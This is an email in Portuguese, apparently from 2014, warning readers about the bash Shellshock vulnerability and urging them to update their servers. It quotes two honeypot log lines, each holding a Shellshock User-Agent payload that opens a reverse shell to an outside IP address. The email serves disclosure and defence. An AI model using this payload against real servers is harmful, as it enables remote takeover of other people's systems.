<div dir="ltr"><div>Caros amigos,</div><div><br></div><div>A vulnerabilidade do bash conhecida como shellshock foi descoberta recentemente e divulgada ontem. Ela permite a execução de comandos remotos nos servidores através dos servidores http.  Os nossos honeypots já estão detectando usuários explorando esta vulnerabilidade hoje. Não percam tempo em atualizar os servidores e evitem fraudes. </div><div><br></div><div>Exemplo do que estamos detectando neste exato momento:</div><div><div><br></div><div>[26/Sep/2014:13:13:57 +0000] &quot;GET / HTTP/1.0&quot; 200 414 &quot;-&quot; &quot;() { :;}; /bin/bash -c &#39;/bin/bash -i &gt;&amp; /dev/tcp/<a href="http://195.225.34.14/3333">195.225.34.14/3333</a> 0&gt;&amp;1&#39;&quot;</div><div>[26/Sep/2014:13:16:54 +0000] &quot;GET /cgi-sys/defaultwebpage.cgi HTTP/1.0&quot; 404 507 &quot;-&quot; &quot;() { :;}; /bin/bash -c &#39;/bin/bash -i &gt;&amp; /dev/tcp/<a href="http://195.225.34.14/3333">195.225.34.14/3333</a> 0&gt;&amp;1&#39;&quot;</div></div><div><br></div><div>Att, </div><div><br></div><div><div dir="ltr">Flavio E. Goncalves<br><div><br></div></div></div>
</div>